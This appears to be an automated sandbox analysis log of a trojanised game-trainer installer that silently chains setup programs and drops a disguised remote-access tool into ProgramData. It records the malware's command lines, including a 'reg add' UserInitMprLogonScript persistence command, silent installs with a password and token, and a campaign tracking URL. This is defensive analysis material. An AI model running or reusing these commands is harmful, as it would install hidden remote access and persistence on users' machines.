                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: String function: 002B35B0 appears 61 times
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: String function: 001B7160 appears 52 times
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: String function: 001BD8D0 appears 90 times
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: String function: 001B9990 appears 39 times
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: String function: 001B9120 appears 40 times
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: String function: 001B87D0 appears 222 times
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: String function: 00067990 appears 34 times
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: String function: 000622B0 appears 157 times
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: String function: 000D8122 appears 35 times
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: String function: 000632C0 appears 185 times
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: String function: 000D8BC0 appears 55 times
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: String function: 00063430 appears 200 times
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: String function: 004F3430 appears 200 times
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: String function: 004F22B0 appears 157 times
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: String function: 004F7990 appears 34 times
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: String function: 00568BC0 appears 55 times
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: String function: 004F32C0 appears 185 times
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: String function: 00568122 appears 35 times
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: String function: 1001B074 appears 45 times
                                  Source: ZmWSzgevgt.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                                  Source: is-74O1B.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                                  Source: setup.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                                  Source: a0.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                                  Source: is-1L53Q.tmp.7.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                                  Source: AdvancedWindowsManager.exe.21.drStatic PE information: Number of sections : 11 > 10
                                  Source: ZmWSzgevgt.exe, 00000000.00000002.4546319029.0000000000B18000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs ZmWSzgevgt.exe
                                  Source: ZmWSzgevgt.exe, 00000000.00000003.2006403390.0000000002658000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs ZmWSzgevgt.exe
                                  Source: ZmWSzgevgt.exe, 00000000.00000003.2006775395.000000007FE35000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs ZmWSzgevgt.exe
                                  Source: ZmWSzgevgt.exe, 00000000.00000000.2004852176.00000000004C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs ZmWSzgevgt.exe
                                  Source: ZmWSzgevgt.exeBinary or memory string: OriginalFileName vs ZmWSzgevgt.exe
                                  Source: C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exeSection loaded: nsmtrace.dllJump to behavior
                                  Source: C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exeSection loaded: nslsp.dllJump to behavior
                                  Source: C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exeSection loaded: pcihooks.dllJump to behavior
                                  Source: C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exeSection loaded: pciinv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeSection loaded: lpk.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeSection loaded: tsappcmp.dll
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeSection loaded: davhlpr.dllole32.dll
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeSection loaded: lpk.dll
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeSection loaded: tsappcmp.dll
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
                                  Source: ZmWSzgevgt.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe" /f
                                  Source: shi4D3B.tmp.33.drBinary string: \Device\NameResTrk\RecordNrtCloneOpenPacket
                                  Source: classification engineClassification label: mal64.troj.evad.winEXE@101/607@56/21
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002B9370 FormatMessageW,GetLastError,20_2_002B9370
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002E3330 GetDiskFreeSpaceExW,20_2_002E3330
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000CE8C0 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,GetWindowThreadProcessId,GetWindowTextW,GetWindowLongW,GetWindowLongW,GetWindowLongW,GetWindowLongW,28_2_000CE8C0
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000C9270 CoCreateInstance,28_2_000C9270
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_0024E810 FindResourceW,LoadResource,LockResource,SizeofResource,20_2_0024E810
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpFile created: C:\Program Files (x86)\river-city-rival-showdown-trainer-15-v1-8-.exeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5728:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4796:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5908:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7312:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4368:120:WilError_03
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeMutant created: \BaseNamedObjects\C:_Program Files (x86)_AW Manager_Windows Manager_Windows Updater.mtx
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4012:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7504:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5588:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:360:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5508:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8160:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1048:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7412:120:WilError_03
                                  Source: C:\Users\user\Desktop\ZmWSzgevgt.exeFile created: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmpJump to behavior
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCommand line argument: RICHED20.DLL28_2_000C8850
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCommand line argument: RICHED20.DLL31_2_00558850
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCommand line argument: >wX31_2_00587690
                                  Source: C:\Users\user\Desktop\ZmWSzgevgt.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\Desktop\ZmWSzgevgt.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                  Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                  Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                  Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                  Source: C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exeFile read: C:\ProgramData\regid.1993-06.com.microsoft\client32.iniJump to behavior
                                  Source: C:\Users\user\Desktop\ZmWSzgevgt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE [Font] ([path] nvarchar(2147483647) NOT NULL CHECK (path <> '') COLLATE NOCASE,[checksum] nvarchar(2147483647),PRIMARY KEY([path]));
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE [Registry] ([path] nvarchar(2147483647) NOT NULL CHECK (path <> '') COLLATE NOCASE,[type] nvarchar(2147483647) DEFAULT 'String',[value] nvarchar(2147483647),PRIMARY KEY([path]));
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE [UpdateBundlePackage] ([updatebundleupi2] nvarchar(2147483647) NOT NULL CHECK (updatebundleupi2 <> ''),[updatepackageupi2] nvarchar(2147483647) NOT NULL CHECK (updatepackageupi2 <> ''),PRIMARY KEY([updatebundleupi2],[updatepackageupi2]));
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE [BundlePackageRegistry] ([bundleupgradecode] nvarchar(2147483647) NOT NULL CHECK (bundleupgradecode <> ''),[packageupi2] nvarchar(2147483647) NOT NULL CHECK (packageupi2 <> ''),[upgradecode] nvarchar(2147483647) NOT NULL CHECK (upgradecode <> ''),PRIMARY KEY([bundleupgradecode],[packageupi2]));
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE [UpdateBundleArp] ([updatebundleupi2] nvarchar(2147483647) NOT NULL CHECK (updatebundleupi2 <> ''),[refupdatebundleupi2] nvarchar(2147483647) CHECK (refupdatebundleupi2 <> ''),PRIMARY KEY([updatebundleupi2],[refupdatebundleupi2]));
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE [GlobalData] ([key] nvarchar(2147483647) NOT NULL CHECK (key <> ''), [value] TEXT NULL, PRIMARY KEY([key]));
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE [Font] ([path] nvarchar(2147483647) NOT NULL CHECK (path <> ''),[checksum] nvarchar(2147483647),PRIMARY KEY([path]));
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE [Registry] ([path] nvarchar(2147483647) NOT NULL CHECK (path <> '') COLLATE NOCASE,[root] nvarchar(2147483647) NOT NULL CHECK (root <> ''),[value] nvarchar(2147483647),PRIMARY KEY([path]));
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE [States] ([state] varchar2 NOT NULL UNIQUE CHECK (state <> ''));
                                  Source: a1.exe, 00000014.00000003.2312703342.00000000011BA000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2312927333.00000000011BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT * FROM `Property` WHERE ;
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE [File] ([path] nvarchar(2147483647) NOT NULL CHECK (path <> ''),[checksum] nvarchar(2147483647),PRIMARY KEY([path]));
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE [File] ([path] nvarchar(2147483647) NOT NULL CHECK (path <> '') COLLATE NOCASE,[checksum] nvarchar(2147483647),PRIMARY KEY([path]));
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE [Shortcut] ([path] nvarchar(2147483647) NOT NULL CHECK (path <> '') COLLATE NOCASE,[commandline] nvarchar(2147483647),PRIMARY KEY([path]));
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE [PackageDependencies] ([packageupi2] nvarchar(2147483647) NOT NULL CHECK (packageupi2 <> ''),[dependencyupi2] nvarchar(2147483647) NOT NULL CHECK (dependencyupi2 <> ''),[istarget] nvarchar(2147483647) NOT NULL CHECK (istarget <> ''),[targetmethod] nvarchar(2147483647) CHECK (targetmethod <> ''),PRIMARY KEY([packageupi2],[dependencyupi2]));
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE [Package] ([upi2] nvarchar(2147483647) NOT NULL CHECK (upi2 <> ''),[name] nvarchar(2147483647) NOT NULL CHECK (name <> ''),[upgradeCode] nvarchar(2147483647) NOT NULL CHECK (upgradeCode <> ''),[installPathMappingsJson] text NULL,PRIMARY KEY([upi2]));
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE [File] ([path] nvarchar(2147483647) NOT NULL CHECK (path <> '') COLLATE NOCASE,[checksum] nvarchar(2147483647),PRIMARY KEY([path]));CREATE TABLE [File] ([path] nvarchar(2147483647) NOT NULL CHECK (path <> ''),[checksum] nvarchar(2147483647),PRIMARY KEY([path]));CREATE TABLE [Font] ([path] nvarchar(2147483647) NOT NULL CHECK (path <> '') COLLATE NOCASE,[checksum] nvarchar(2147483647),PRIMARY KEY([path]));CREATE TABLE [Font] ([path] nvarchar(2147483647) NOT NULL CHECK (path <> ''),[checksum] nvarchar(2147483647),PRIMARY KEY([path]));CREATE TABLE [Registry] ([path] nvarchar(2147483647) NOT NULL CHECK (path <> '') COLLATE NOCASE,[type] nvarchar(2147483647) DEFAULT 'String',[value] nvarchar(2147483647),PRIMARY KEY([path]));CREATE TABLE [Shortcut] ([path] nvarchar(2147483647) NOT NULL CHECK (path <> '') COLLATE NOCASE,[commandline] nvarchar(2147483647),PRIMARY KEY([path]));]) ON DELETE NO ACTION ON UPDATE NO ACTION);CREATE TABLE [PackageFile] ([path] nvarchar(2147483647) NOT NULL CHECK (path <> '') COLLATE NOCASE,[upi2] nvarchar(2147483647) NOT NULL CHECK (upi2 <> ''),CONSTRAINT[sqlite_autoindex_PackageFile_1] PRIMARY KEY([path], [upi2]), FOREIGN KEY([upi2]) REFERENCES[Package]([CREATE TABLE [PackageFont] ([path] nvarchar(2147483647) NOT NULL CHECK (path <> '') COLLATE NOCASE,[upi2] nvarchar(2147483647) NOT NULL CHECK (upi2 <> ''),CONSTRAINT[sqlite_autoindex_PackageFont_1] PRIMARY KEY([path], [upi2]), FOREIGN KEY([upi2]) REFERENCES[Package]([P
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005711000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE [PackageDependencies] ([packageupi2] nvarchar(2147483647) NOT NULL CHECK (packageupi2 <> ''),[dependencyupi2] nvarchar(2147483647) NOT NULL CHECK (dependencyupi2 <> ''),PRIMARY KEY([packageupi2],[dependencyupi2]));
                                  Source: ZmWSzgevgt.exeReversingLabs: Detection: 29%
                                  Source: a1.exeString found in binary or memory: https://installeranalytics.com
                                  Source: Windows Updater.exeString found in binary or memory: -startminimized
                                  Source: Windows Updater.exeString found in binary or memory: /install
                                  Source: Windows Updater.exeString found in binary or memory: -startappfirst
                                  Source: Windows Updater.exeString found in binary or memory: -installready
                                  Source: Windows Updater.exeString found in binary or memory: /installservice
                                  Source: Windows Updater.exeString found in binary or memory: /install
                                  Source: Windows Updater.exeString found in binary or memory: -startminimized
                                  Source: Windows Updater.exeString found in binary or memory: -startappfirst
                                  Source: Windows Updater.exeString found in binary or memory: -installready
                                  Source: Windows Updater.exeString found in binary or memory: /installservice
                                  Source: ZmWSzgevgt.exeString found in binary or memory: /LOADINF="filename"
                                  Source: C:\Users\user\Desktop\ZmWSzgevgt.exeFile read: C:\Users\user\Desktop\ZmWSzgevgt.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\ZmWSzgevgt.exe C:\Users\user\Desktop\ZmWSzgevgt.exe
                                  Source: C:\Users\user\Desktop\ZmWSzgevgt.exeProcess created: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmp "C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmp" /SL5="$20408,832512,832512,C:\Users\user\Desktop\ZmWSzgevgt.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exe C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exe
                                  Source: C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp "C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp" /SL5="$1047E,4289520,832512,C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exe "C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exe" /VERYSILENT /PASSWORD=NtIRVUpMK9ZD30Nf98220 -token mtn1co3fo4gs5vwq -subid 2598
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exeProcess created: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmp "C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmp" /SL5="$204E6,10235147,832512,C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exe" /VERYSILENT /PASSWORD=NtIRVUpMK9ZD30Nf98220 -token mtn1co3fo4gs5vwq -subid 2598
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c expand C:\Users\user\AppData\Local\Temp\is-TMJSM.tmp\{app}\aglwjhm.cab -F:* %ProgramData%
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand C:\Users\user\AppData\Local\Temp\is-TMJSM.tmp\{app}\aglwjhm.cab -F:* C:\ProgramData
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\wmiprvse.exe" /f
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe" /f
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess created: C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c start https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i^&c=5306757^&pl=0x03^&pb=1^&px=2598
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i&c=5306757&pl=0x03&pb=1&px=2598
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1944,i,7293326498590966015,15724221701917447522,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe" /qn CAMPAIGN="2598
                                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7B2098DE867FDA1FBAC9E94E8D311FE9 C
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Johan.msi" /qn CAMPAIGN=2598 AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\is-53US7.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1701869374 /qn CAMPAIGN=""2598"" " CAMPAIGN="2598
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CB3F137362C364F2A010C44D44B9B692
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                  Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A0F7B99CF6F59695615DF13CC6461763 E Global\MSI0000
                                  Source: unknownProcess created: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe "C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe" /silentall -nofreqcheck -nogui
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeProcess created: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exe C:\Windows\TEMP\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exe" /install silentall "C:\Windows\TEMP\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.ini
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeProcess created: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe "C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe"
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9A415338A0E06E3AA66F7530B5FE606F C
